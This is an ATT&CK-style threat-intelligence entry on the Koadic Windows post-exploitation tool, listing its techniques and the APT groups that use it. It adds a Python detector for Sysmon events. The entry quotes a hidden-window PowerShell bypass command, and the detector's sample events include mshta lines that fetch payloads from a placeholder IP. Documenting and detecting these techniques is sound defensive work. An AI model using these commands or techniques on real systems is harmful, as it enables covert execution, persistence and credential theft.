
Koadic

Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)
ID: S0250
Type: TOOL
Platforms: Windows
Version: 2.0
Created: 17 Oct 2018
Last Modified: 06 Apr 2022

Techniques Used

Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

Koadic has two methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.(Citation: Github Koadic)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Koadic has used HTTP for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Koadic has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.(Citation: MalwareBytes LazyScripter Feb 2021)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Koadic has used PowerShell to establish persistence.(Citation: MalwareBytes LazyScripter Feb 2021)

.003 Command and Scripting Interpreter: Windows Command Shell

Koadic can open an interactive command shell to perform command-line functions on victim machines. Koadic performs most of its operations using Windows Script Host (JScript) and can run arbitrary shellcode.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)

.005 Command and Scripting Interpreter: Visual Basic

Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode.(Citation: Github Koadic)

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Koadic can use SSL and TLS for communications.(Citation: Github Koadic)

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Koadic has used the command `Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden` to hide its window.(Citation: MalwareBytes LazyScripter Feb 2021)

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Koadic can gather hashed passwords by dumping the SAM and SECURITY hives.(Citation: Github Koadic)

.003 OS Credential Dumping: NTDS

Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

Koadic can perform process injection by using a reflective DLL.(Citation: Github Koadic)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Koadic can enable remote desktop on the victim's machine.(Citation: Github Koadic)

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Koadic has used scheduled tasks to add persistence.(Citation: MalwareBytes LazyScripter Feb 2021)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)

.010 System Binary Proxy Execution: Regsvr32

Koadic can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)

.011 System Binary Proxy Execution: Rundll32

Koadic can use Rundll32 to execute additional payloads.(Citation: Github Koadic)

Enterprise T1569 .002 System Services: Service Execution

Koadic can run a command on another machine using PsExec.(Citation: Github Koadic)
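Several of the behaviours above (the hidden-window PowerShell launch, the `Run` key persistence, and payload staging through mshta/regsvr32/rundll32) leave process-creation and registry events that a SOC can match on. The following detector is an added example, not code from this page or from the Koadic project; it assumes Sysmon-style events (EventID 1 process creation, EventID 13 registry value set) flattened to `field=value` pairs, and the sample events and the 203.0.113.5 address are constructed.

```python
import re

# Constructed sample events (not from the page); Sysmon field names are real,
# the values and the 203.0.113.5 address are made up for the example.
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\Users\\Public\\t.ps1"',
    'EventID=1 Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe http://203.0.113.5/stage"',
    'EventID=13 TargetObject=HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater '
    'Details="mshta http://203.0.113.5/p"',
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe readme.txt"',
]

# key=value pairs; a value is either a double-quoted string or a run of non-spaces
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# T1564.003 / T1059.001: hidden window plus execution-policy bypass (short forms included)
HIDDEN_RE = re.compile(r'-w(?:indowstyle)?\s+hidden', re.I)
BYPASS_RE = re.compile(r'-(?:ex[a-z]*|ep)\s+bypass', re.I)
# T1547.001: value written under the per-user Run key
RUN_KEY_RE = re.compile(r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\', re.I)
SCRIPT_HOSTS = ('mshta', 'wscript', 'cscript', 'regsvr32', 'rundll32', 'powershell')
# T1218.005/.010/.011: signed proxy binaries given a URL to fetch a payload from
PROXY_BINS = ('mshta.exe', 'regsvr32.exe', 'rundll32.exe')


def parse_event(line):
    """Turn one flattened event line into a dict of field -> value."""
    return {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(line)}


def evaluate(event):
    """Return the ATT&CK technique IDs whose detection logic the event matches."""
    hits = []
    cmd = event.get('CommandLine', '')
    image = event.get('Image', '').rsplit('\\', 1)[-1].lower()
    if event.get('EventID') == '1':
        if image.startswith('powershell') and HIDDEN_RE.search(cmd) and BYPASS_RE.search(cmd):
            hits.append('T1564.003')
        if image in PROXY_BINS and re.search(r'https?://', cmd, re.I):
            hits.append('T1218')
    elif event.get('EventID') == '13':
        details = event.get('Details', '').lower()
        if RUN_KEY_RE.search(event.get('TargetObject', '')) and any(h in details for h in SCRIPT_HOSTS):
            hits.append('T1547.001')
    return hits


def scan(lines):
    """Map line index -> matched techniques for every line that triggers a rule."""
    results = {i: evaluate(parse_event(line)) for i, line in enumerate(lines)}
    return {i: hits for i, hits in results.items() if hits}
```

Each rule fires on a single event; correlating the Run key write with the earlier hidden PowerShell launch from the same session is the natural next step in a real pipeline.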

Groups That Use This Software

ID Name References

G0007 APT28 (Citation: Palo Alto Sofacy 06-2018)

G0140 LazyScripter (Citation: MalwareBytes LazyScripter Feb 2021)

G0121 Sidewinder (Citation: ATT Sidewinder January 2021)

G0069 MuddyWater (Citation: Reaqta MuddyWater November 2017) (Citation: TrendMicro POWERSTATS V3 June 2019)
